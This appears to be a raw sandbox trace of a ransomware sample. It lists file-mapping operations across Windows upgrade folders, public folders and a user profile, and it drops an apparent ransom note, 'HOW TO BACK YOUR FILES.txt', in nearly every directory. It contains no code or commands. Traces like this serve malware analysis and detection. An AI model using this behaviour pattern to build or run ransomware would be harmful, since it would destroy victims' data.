Create Mapping C:\Windows10Upgrade\resources\hwcompatShared.txt filename = C:\Windows10Upgrade\resources\hwcompatShared.txt, protection = PAGE_READWRITE, maximum_size = 826144 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\HOW TO BACK YOUR FILES.txt filename = Z:\Recovery\WindowsRE\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\2052\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\2052\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\block.png filename = C:\Windows10Upgrade\resources\ux\block.png, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\bluelogo.png filename = C:\Windows10Upgrade\resources\ux\bluelogo.png, protection = PAGE_READWRITE, maximum_size = 7856 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\bullet.png filename = C:\Windows10Upgrade\resources\ux\bullet.png, protection = PAGE_READWRITE, maximum_size = 992 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default.css filename = C:\Windows10Upgrade\resources\ux\default.css, protection = PAGE_READWRITE, maximum_size = 6544 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default.htm filename = C:\Windows10Upgrade\resources\ux\default.htm, protection = PAGE_READWRITE, maximum_size = 63312 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_eos.css filename = C:\Windows10Upgrade\resources\ux\default_eos.css, protection = PAGE_READWRITE, maximum_size = 7472 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_eos.htm filename = C:\Windows10Upgrade\resources\ux\default_eos.htm, protection = PAGE_READWRITE, maximum_size = 56640 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_oobe.css filename = C:\Windows10Upgrade\resources\ux\default_oobe.css, protection = PAGE_READWRITE, maximum_size = 6000 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_oobe.htm filename = C:\Windows10Upgrade\resources\ux\default_oobe.htm, protection = PAGE_READWRITE, maximum_size = 66480 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\eula.css filename = C:\Windows10Upgrade\resources\ux\eula.css, protection = PAGE_READWRITE, maximum_size = 864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\GetStarted.png filename = C:\Windows10Upgrade\resources\ux\GetStarted.png, protection = PAGE_READWRITE, maximum_size = 4592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png filename = C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png, protection = PAGE_READWRITE, maximum_size = 4848 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\loading.gif filename = C:\Windows10Upgrade\resources\ux\loading.gif, protection = PAGE_READWRITE, maximum_size = 18176 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\lock.png filename = C:\Windows10Upgrade\resources\ux\lock.png, protection = PAGE_READWRITE, maximum_size = 4448 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\logo.png filename = C:\Windows10Upgrade\resources\ux\logo.png, protection = PAGE_READWRITE, maximum_size = 3392 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\marketing.png filename = C:\Windows10Upgrade\resources\ux\marketing.png, protection = PAGE_READWRITE, maximum_size = 1264 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht filename = C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht, protection = PAGE_READWRITE, maximum_size = 622864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png filename = C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png, protection = PAGE_READWRITE, maximum_size = 2944 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png filename = C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png, protection = PAGE_READWRITE, maximum_size = 2992 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\pass.png filename = C:\Windows10Upgrade\resources\ux\pass.png, protection = PAGE_READWRITE, maximum_size = 2592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js, protection = PAGE_READWRITE, maximum_size = 1284304 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js, protection = PAGE_READWRITE, maximum_size = 3047616 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css, protection = PAGE_READWRITE, maximum_size = 41728 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css, protection = PAGE_READWRITE, maximum_size = 269936 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm, protection = PAGE_READWRITE, maximum_size = 111216 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm, protection = PAGE_READWRITE, maximum_size = 254224 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm, protection = PAGE_READWRITE, maximum_size = 84096 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm, protection = PAGE_READWRITE, maximum_size = 65952 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm, protection = PAGE_READWRITE, maximum_size = 71232 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm, protection = PAGE_READWRITE, maximum_size = 240224 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm, protection = PAGE_READWRITE, maximum_size = 59328 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm, protection = PAGE_READWRITE, maximum_size = 59328 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm, protection = PAGE_READWRITE, maximum_size = 70592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm, protection = PAGE_READWRITE, maximum_size = 70592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm, protection = PAGE_READWRITE, maximum_size = 63872 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm, protection = PAGE_READWRITE, maximum_size = 71520 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm, protection = PAGE_READWRITE, maximum_size = 70160 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm, protection = PAGE_READWRITE, maximum_size = 70160 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm, protection = PAGE_READWRITE, maximum_size = 865424 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm, protection = PAGE_READWRITE, maximum_size = 65648 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm, protection = PAGE_READWRITE, maximum_size = 85344 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm, protection = PAGE_READWRITE, maximum_size = 70256 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm, protection = PAGE_READWRITE, maximum_size = 211024 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm, protection = PAGE_READWRITE, maximum_size = 634864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm, protection = PAGE_READWRITE, maximum_size = 76864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm, protection = PAGE_READWRITE, maximum_size = 84688 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm, protection = PAGE_READWRITE, maximum_size = 67968 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm, protection = PAGE_READWRITE, maximum_size = 68000 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm, protection = PAGE_READWRITE, maximum_size = 82592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm, protection = PAGE_READWRITE, maximum_size = 69072 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm, protection = PAGE_READWRITE, maximum_size = 71824 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm, protection = PAGE_READWRITE, maximum_size = 78944 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm, protection = PAGE_READWRITE, maximum_size = 284624 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm, protection = PAGE_READWRITE, maximum_size = 82736 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm, protection = PAGE_READWRITE, maximum_size = 66928 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm, protection = PAGE_READWRITE, maximum_size = 76320 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm, protection = PAGE_READWRITE, maximum_size = 71168 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm, protection = PAGE_READWRITE, maximum_size = 254928 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm, protection = PAGE_READWRITE, maximum_size = 75920 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm, protection = PAGE_READWRITE, maximum_size = 267504 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm, protection = PAGE_READWRITE, maximum_size = 127024 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm, protection = PAGE_READWRITE, maximum_size = 147920 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm, protection = PAGE_READWRITE, maximum_size = 147920 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\EULA\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml filename = C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml, protection = PAGE_READWRITE, maximum_size = 94656 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\hwcompat.txt filename = C:\Windows10Upgrade\resources\amd64\hwcompat.txt, protection = PAGE_READWRITE, maximum_size = 73904 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\hwexclude.txt filename = C:\Windows10Upgrade\resources\amd64\hwexclude.txt, protection = PAGE_READWRITE, maximum_size = 3088 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\nxquery.cat filename = C:\Windows10Upgrade\resources\amd64\nxquery.cat, protection = PAGE_READWRITE, maximum_size = 10688 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\nxquery.inf filename = C:\Windows10Upgrade\resources\amd64\nxquery.inf, protection = PAGE_READWRITE, maximum_size = 2272 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\amd64\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\dll2\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\dll2\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\dll1\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\dll1\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\HOW TO BACK YOUR FILES.txt filename = C:\Users\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Videos\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Videos\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Pictures\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Pictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Music\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Music\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Libraries\RecordedTV.library-ms filename = C:\Users\Public\Libraries\RecordedTV.library-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Users\Public\Libraries\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Libraries\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Downloads\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Downloads\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Documents\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Documents\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Desktop\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Desktop\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\AccountPictures\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\AccountPictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\2NnCc4KzPlFvi.swf filename = C:\Users\FD1HVy\Videos\2NnCc4KzPlFvi.swf, protection = PAGE_READWRITE, maximum_size = 2400 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\5K6QHDJbfIWjYG262dir.avi filename = C:\Users\FD1HVy\Videos\5K6QHDJbfIWjYG262dir.avi, protection = PAGE_READWRITE, maximum_size = 73184 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\ccn85Ai_.mp4 filename = C:\Users\FD1HVy\Videos\ccn85Ai_.mp4, protection = PAGE_READWRITE, maximum_size = 83024 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\nZxJYVmIXHGhm.flv filename = C:\Users\FD1HVy\Videos\nZxJYVmIXHGhm.flv, protection = PAGE_READWRITE, maximum_size = 27312 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\ofQy-RjpJsOl2h.avi filename = C:\Users\FD1HVy\Videos\ofQy-RjpJsOl2h.avi, protection = PAGE_READWRITE, maximum_size = 23616 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\s9NfPDdsE6nhezSDza.flv filename = C:\Users\FD1HVy\Videos\s9NfPDdsE6nhezSDza.flv, protection = PAGE_READWRITE, maximum_size = 100336 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\XZJL mjrH9\b70zp1nV4_RX.flv filename = C:\Users\FD1HVy\Videos\XZJL mjrH9\b70zp1nV4_RX.flv, protection = PAGE_READWRITE, maximum_size = 58624 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\XZJL mjrH9\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\XZJL mjrH9\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\9v2jkjY15yj.mp4 filename = C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\9v2jkjY15yj.mp4, protection = PAGE_READWRITE, maximum_size = 62976 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Aksfbq.flv filename = C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Aksfbq.flv, protection = PAGE_READWRITE, maximum_size = 38976 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\CokPtPcir1Km9h.swf filename = C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\CokPtPcir1Km9h.swf, protection = PAGE_READWRITE, maximum_size = 94144 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\FFQYJepVdSMrceUSp.flv filename = C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\FFQYJepVdSMrceUSp.flv, protection = PAGE_READWRITE, maximum_size = 94288 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\JKXNIWeQxs8Bq.swf filename = C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\JKXNIWeQxs8Bq.swf, protection = PAGE_READWRITE, maximum_size = 12416 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\NfDZ9FmKUznX7QjqQB0.flv filename = C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\NfDZ9FmKUznX7QjqQB0.flv, protection = PAGE_READWRITE, maximum_size = 77376 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\OKe9Vwu AXHg.avi filename = C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\OKe9Vwu AXHg.avi, protection = PAGE_READWRITE, maximum_size = 3392 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Ox_K.flv filename = C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Ox_K.flv, protection = PAGE_READWRITE, maximum_size = 58768 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\flFRhosiB.flv filename = C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\flFRhosiB.flv, protection = PAGE_READWRITE, maximum_size = 43952 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\LRb2X8JvR7dXd5G2QS.avi filename = C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\LRb2X8JvR7dXd5G2QS.avi, protection = PAGE_READWRITE, maximum_size = 42464 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\MOuupnQy6t5YPt.avi filename = C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\MOuupnQy6t5YPt.avi, protection = PAGE_READWRITE, maximum_size = 27792 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\xBzkCKlaqOVT0MjkjP6.mp4 filename = C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\xBzkCKlaqOVT0MjkjP6.mp4, protection = PAGE_READWRITE, maximum_size = 37504 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\82zMDESjlfgM7otH 3.avi filename = C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\82zMDESjlfgM7otH 3.avi, protection = PAGE_READWRITE, maximum_size = 53280 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\JCuda3TbU9_aKKvhOer.flv filename = C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\JCuda3TbU9_aKKvhOer.flv, protection = PAGE_READWRITE, maximum_size = 57488 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\qkjB9QUudeJrk jkCRq.flv filename = C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\qkjB9QUudeJrk jkCRq.flv, protection = PAGE_READWRITE, maximum_size = 72464 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\rjtTtY.flv filename = C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\rjtTtY.flv, protection = PAGE_READWRITE, maximum_size = 76736 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\X xmY.flv filename = C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\X xmY.flv, protection = PAGE_READWRITE, maximum_size = 51072 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\K8H_yKdZxq7njjSb.mkv filename = C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\K8H_yKdZxq7njjSb.mkv, protection = PAGE_READWRITE, maximum_size = 70096 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\TaaSYvvFHS17rq.mp4 filename = C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\TaaSYvvFHS17rq.mp4, protection = PAGE_READWRITE, maximum_size = 57776 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\_Vz8dSb7ILROS.flv filename = C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\_Vz8dSb7ILROS.flv, protection = PAGE_READWRITE, maximum_size = 4624 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\wyauoDThVWGo4KOPbrPe.flv filename = C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\wyauoDThVWGo4KOPbrPe.flv, protection = PAGE_READWRITE, maximum_size = 26112 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms filename = C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms, protection = PAGE_READWRITE, maximum_size = 1632 True 1
Fn
Create Mapping C:\Users\FD1HVy\Searches\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Searches\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Saved Games\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Saved Games\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\0P3NBwM7Yaa5LdwVnoJJ.png filename = C:\Users\FD1HVy\Pictures\0P3NBwM7Yaa5LdwVnoJJ.png, protection = PAGE_READWRITE, maximum_size = 26192 True 1
Fn
